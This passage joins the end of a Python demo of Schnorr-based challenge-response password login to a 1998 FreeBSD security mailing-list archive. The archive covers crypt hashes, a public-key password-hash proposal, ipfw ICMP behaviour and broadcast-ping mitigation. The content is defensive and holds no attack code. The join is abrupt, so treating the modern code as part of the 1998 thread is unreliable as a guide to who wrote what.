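    """Server -> client: the account's salt plus fresh random data."""
    return {"salt": record["salt"], "nonce": secrets.token_bytes(32)}


def client_respond(password: str, challenge: dict) -> dict:
    """Client -> server: Schnorr signature (c, s) over the server's nonce."""
    x = derive_private_key(password, challenge["salt"])
    k = secrets.randbelow(Q - 1) + 1  # one-time secret, never reused
    c = _bind(pow(G, k, P), pow(G, x, P), challenge["nonce"])
    return {"c": c, "s": (k + c * x) % Q}


def server_verify(record: dict, challenge: dict, response: dict) -> bool:
    """Recompute the commitment from (c, s) and the stored public key."""
    c, s, y = response["c"], response["s"], record["public"]
    if not (0 <= c < 2**256 and 0 <= s < Q):
        return False
    commitment = pow(G, s, P) * pow(y, Q - c, P) % P  # g^s * y^(-c) = g^k
    expected = _bind(commitment, y, challenge["nonce"])
    return hmac.compare_digest(expected.to_bytes(32, "big"), c.to_bytes(32, "big"))


if __name__ == "__main__":
    rec = enroll("correct horse battery")  # constructed sample password
    ch = server_challenge(rec)
    good = client_respond("correct horse battery", ch)
    bad = client_respond("guess", ch)
    print("right password accepted:", server_verify(rec, ch, good))
    print("wrong password accepted:", server_verify(rec, ch, bad))
```

A stolen record still permits offline guessing, because anyone can re-derive candidate key pairs from the salt, which is why the derivation is stretched. What the exchange removes is the need to send the password, or any replayable value, to the server.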

From owner-freebsd-security Sat May 30 12:20:37 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA19615 for freebsd-security-outgoing; Sat, 30 May 1998 12:20:37 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from critter.freebsd.dk ([195.8.133.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA19600 for ; Sat, 30 May 1998 12:20:13 -0700 (PDT) (envelope-from phk@critter.freebsd.dk)
Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.8.7/8.8.5) with ESMTP id VAA20475; Sat, 30 May 1998 21:18:28 +0200 (CEST)
To: Eivind Eklund
cc: "J.A. Terranson" , "freebsd-security@FreeBSD.ORG"
Subject: Re: MD5 v. DES?
In-reply-to: Your message of "Sat, 30 May 1998 20:32:04 +0200." <19980530203204.34537@follo.net>
Date: Sat, 30 May 1998 21:18:27 +0200
Message-ID: <20473.896555907@critter.freebsd.dk>
From: Poul-Henning Kamp
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message <19980530203204.34537@follo.net>, Eivind Eklund writes:
>On Sat, May 30, 1998 at 12:07:57PM -0500, J.A. Terranson wrote:

>Apart from that, my ideal hash for a password file is one based on
>searching for public keys. It'd go like this:
>(1) Salt the password
>(2) Use a cheap one-way hash to create a start value for a
>    pseudo-random function (e.g, an LFSR)
>(3) Use the random-function to do a deterministic search for a
>    public/private key pair
>(4) Store the salt and the public part of the key as the hash

I have been considering if we shouldn't introduce a

	int checkuserpassword(char *user, char *password);

in some library, rather than having all these programs know that
you should strcmp after calling crypt(). This would allow us to
do what you propose or RADIUS authentication for that matter...

--
Poul-Henning Kamp             FreeBSD coreteam member
phk@FreeBSD.ORG               "Real hackers run -current on their laptop."
"ttyv0" -- What UNIX calls a $20K state-of-the-art, 3D, hi-res color terminal

From owner-freebsd-security Sat May 30 12:32:38 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA20937 for freebsd-security-outgoing; Sat, 30 May 1998 12:32:38 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from alpha.sea-to-sky.net (sreid@sea-to-sky.net [204.244.200.240]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA20880; Sat, 30 May 1998 12:32:09 -0700 (PDT) (envelope-from sreid@alpha.sea-to-sky.net)
Received: (from sreid@localhost) by alpha.sea-to-sky.net (8.8.7/8.8.7) id MAA20828; Sat, 30 May 1998 12:40:30 -0700
Date: Sat, 30 May 1998 12:40:30 -0700 (PDT)
From: Steve Reid
To: "J.A. Terranson"
cc: "'Gary Palmer'" , Open Systems Networking , Cory Kempf , "freebsd-security@FreeBSD.ORG"
Subject: RE: MD5 v. DES?
In-Reply-To: <01BD8BC3.962CBD80@w3svcs.mfn.org>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sat, 30 May 1998, J.A. Terranson wrote:
> Within this context, I would submit that DES is the "better"
> function, as it is not subject to "birthday" problems, I do realize
> however, in the *real* world, this is probably not a *real* issue...

As far as I know, all hash functions are subject to birthday attacks,
including DES when it is used as a hash function. In fact, DES-based
crypt is more vulnerable to birthday attacks than MD5, because the DES
hash produces fewer bits.

Birthday attacks don't really work against password files though: you'd
need to have billions of users before you are likely to have two with
different password/salt but the same DES hash.

As for DES and MD5 being apples and oranges, that's not quite true.
There are constructions to use block ciphers as hash functions, and
constructions to use hash functions as block ciphers. Still, you are
better off using the right tool for the job, which in the case of crypt
is MD5 (when you have the choice).

From owner-freebsd-security Sat May 30 14:02:11 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA02649 for freebsd-security-outgoing; Sat, 30 May 1998 14:02:11 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from ns1.yes.no (ns1.yes.no [195.119.24.10]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA02455 for ; Sat, 30 May 1998 14:00:32 -0700 (PDT) (envelope-from eivind@bitbox.follo.net)
Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.8.7/8.8.7) with ESMTP id VAA13668; Sat, 30 May 1998 21:00:28 GMT
Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id WAA06137; Sat, 30 May 1998 22:58:47 +0200 (MET DST)
Message-ID: <19980530225842.57628@follo.net>
Date: Sat, 30 May 1998 22:58:42 +0200
From: Eivind Eklund
To: Poul-Henning Kamp
Cc: "J.A. Terranson" , "freebsd-security@FreeBSD.ORG"
Subject: Re: MD5 v. DES?
References: <19980530203204.34537@follo.net> <20473.896555907@critter.freebsd.dk>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.89.1i
In-Reply-To: <20473.896555907@critter.freebsd.dk>; from Poul-Henning Kamp on Sat, May 30, 1998 at 09:18:27PM +0200
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sat, May 30, 1998 at 09:18:27PM +0200, Poul-Henning Kamp wrote:
> I have been considering if we shouldn't introduce a
>
> 	int checkuserpassword(char *user, char *password);
>
> in some library, rather than having all these programs know that
> you should strcmp after calling crypt(). This would allow us to
> do what you propose or RADIUS authentication for that matter...

I think the basic idea is good. It is not required for what I
proposed - that will work perfectly well as a normal hash - but I'd
still like to abstract.

However, wouldn't it be advantageous to be able to do other forms of
authentication too, like tokens etc? These might require a challenge,
and an API to handle this. I'm told PKCS#11 (reference paper from
RSA, Inc) contains an API-standard for it.

Eivind.

From owner-freebsd-security Sat May 30 14:52:09 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA10479 for freebsd-security-outgoing; Sat, 30 May 1998 14:52:09 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from mail.ftf.dk (mail.ftf.dk [129.142.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA10315 for ; Sat, 30 May 1998 14:51:06 -0700 (PDT) (envelope-from regnauld@deepo.prosa.dk)
Received: from mail.prosa.dk ([192.168.100.2]) by mail.ftf.dk (8.8.8/8.8.8/gw-ftf-1.0) with ESMTP id XAA01450 for ; Sat, 30 May 1998 23:50:39 +0200 (CEST) (envelope-from regnauld@deepo.prosa.dk)
X-Authentication-Warning: mail.ftf.dk: Host [192.168.100.2] claimed to be mail.prosa.dk
Received: from deepo.prosa.dk (deepo.prosa.dk [192.168.100.10]) by mail.prosa.dk (8.8.5/8.8.5/prosa-1.1) with ESMTP id XAA16643 for ; Sat, 30 May 1998 23:51:17 +0200 (CEST)
Received: (from regnauld@localhost) by deepo.prosa.dk (8.8.8/8.8.5/prosa-1.1) id XAA25176 for freebsd-security@freebsd.org; Sat, 30 May 1998 23:49:42 +0200 (CEST)
Message-ID: <19980530234807.14632@deepo.prosa.dk>
Date: Sat, 30 May 1998 23:48:08 +0200
From: Philippe Regnauld
To: security@deepo.prosa.dk
Cc: freebsd-net@FreeBSD.ORG
Subject: ipfw & icmp question
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.88e
X-Operating-System: FreeBSD 2.2.6-RELEASE i386
Organization: PROSA
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

[crossposting to -net and -security -- shoot me if necessary]

I am a bit puzzled regarding the following situation:

I have a machine with IPFW setup to send "port unreachable" if a
connection attempt is made on port 113/TCP (identd). The policy is
default deny.

Here is what happens when I do "telnet host 113"

- from a FreeBSD host (A.B.C.D) to the FreeBSD box (E.F.G.H):

01:35:02.307343 A.B.C.D.2218 > E.F.G.H.113: S 2940925835:2940925835(0) win 16384 (DF) [tos 0x10]
01:35:02.308070 E.F.G.H > A.B.C.D: icmp: E.F.G.H tcp port 113 unreachable (DF)
01:35:04.850388 A.B.C.D.2218 > E.F.G.H.113: S 2940925835:2940925835(0) win 16384 (DF) [tos 0x10]
01:35:04.851237 E.F.G.H > A.B.C.D: icmp: E.F.G.H tcp port 113 unreachable (DF)

Symptom: the connection is NOT dropped right away, and the first
host (A.B.C.D) keeps on trying until timeout -- thus the packet being
sent twice as above)

Both hosts are 2.2.6

- from a Linux box (W.X.Y.Z) to the same FreeBSD box (E.F.G.H):

01:38:22.901190 W.X.Y.Z.1166 > E.F.G.H.113: S 3448428087:3448428087(0) win 512
01:38:22.901969 E.F.G.H > W.X.Y.Z: icmp: E.F.G.H tcp port 113 unreachable

No problem here, the linux telnet responds:

Trying E.F.G.H...
telnet: Unable to connect to remote host: Connection refused

... and returns right away.

The IPFW rule is:

    add unreach port tcp from any to E.F.G.H 113

... and of course ICMP messages are enabled.

Help ? :-} I've looked in the O'Reilly book and other sources but
I can't find out this one.

PS: in the /etc/rc.firewall (2.2.6 still), one rule says for
the "Simple firewall setup":

    # Allow DNS queries out in the world
    /sbin/ipfw add pass udp from any 53 to ${oip}
    /sbin/ipfw add pass udp from ${oip} to any 53

This is a bit confusing -- from reading the rules, I understand:
"Allow DNS queries, from out in the world, to us", while the
formulation above says "Allow DNS queries from inside/here out into
the world".

My 0.02 Euros^H^HDKK.

--
-[ Philippe Regnauld / Sysadmin ]-

From owner-freebsd-security Sat May 30 16:06:59 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA21071 for freebsd-security-outgoing; Sat, 30 May 1998 16:06:59 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from ns2.sminter.com.ar (ns2.sminter.com.ar [200.10.100.11]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA20046 for ; Sat, 30 May 1998 15:59:58 -0700 (PDT) (envelope-from Recabarren!fpscha@ns2.sminter.com.ar)
Received: (from uucp@localhost) by ns2.sminter.com.ar (8.8.5/8.8.4) id TAA28256 for FreeBSD.ORG!freebsd-security; Sat, 30 May 1998 19:58:22 -0300 (GMT)
>Received: (from fpscha@localhost) by localhost.schapachnik.com.ar (8.8.5/8.8.5) id JAA00209; Sat, 30 May 1998 09:31:47 -0300 (ARST)
From: "Fernando P. Schapachnik"
Message-Id: <199805301231.JAA00209@localhost.schapachnik.com.ar>
Subject: Re: Possible DoS opportunity via ping implementation error?
To: dg@root.com
Date: Sat, 30 May 1998 09:31:46 -0300 (ARST)
Cc: andrew@squiz.co.nz, sysadmin@mfn.org, freebsd-security@FreeBSD.ORG
In-Reply-To: <199805272358.QAA10311@implode.root.com> from David Greenman at "May 27, 98 04:58:31 pm"
Reply-To: fpscha@schapachnik.com.ar
X-Mailer: ELM [version 2.4ME+ PL22 (25)]
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Content-Type: text/plain; charset=ISO-8859-1
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In a previous message David Greenman wrote:
> >
> >I'd like to know which.
> ...
> >>FreeBSD, Inc.
> >>=============
> >>In FreeBSD 2.2.5 and up, the tcp/ip stack does not respond to icmp
> >>echo requests destined to broadcast and multicast addresses by default. This
> >>behaviour can be changed via the sysctl command via
> >>mib net.inet.icmp.bmcastecho.
>
> The CERT advisory is wrong.
> FreeBSD has always responded to broadcast ICMP
> echo requests by default. Further, the option mentioned to disable them was
> broken in 2.2.x and -current until just yesterday.

Anyway, as a piece of advice, the best thing you can do is to
configure your router interfaces to disallow broadcasts. This is done
via the 'no ip directed broadcast' command on the serial interfaces, on
CISCO routers.

Of course, this is not a final solution, but is very practical if you
can "trust" your LAN, as is mostly the case.

Regards!

Fernando P. Schapachnik
fpscha@schapachnik.com.ar

From owner-freebsd-security Sat May 30 23:03:57 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA09452 for freebsd-security-outgoing; Sat, 30 May 1998 23:03:57 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from hamptons.com (hamptons.com [204.141.112.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA09355 for ; Sat, 30 May 1998 23:03:41 -0700 (PDT) (envelope-from gms@hamptons.com)
Received: from [204.141.112.238] ([204.141.112.238]) by hamptons.com with ESMTP (IPAD 2.03) id 4030400 ; Sun, 31 May 1998 02:03:37 EST
X-Sender: gms@mail.hamptons.com
Message-Id:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Sun, 31 May 1998 02:02:24 -0500
To: freebsd-security@FreeBSD.ORG
From: GMS
Subject: subscribe
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org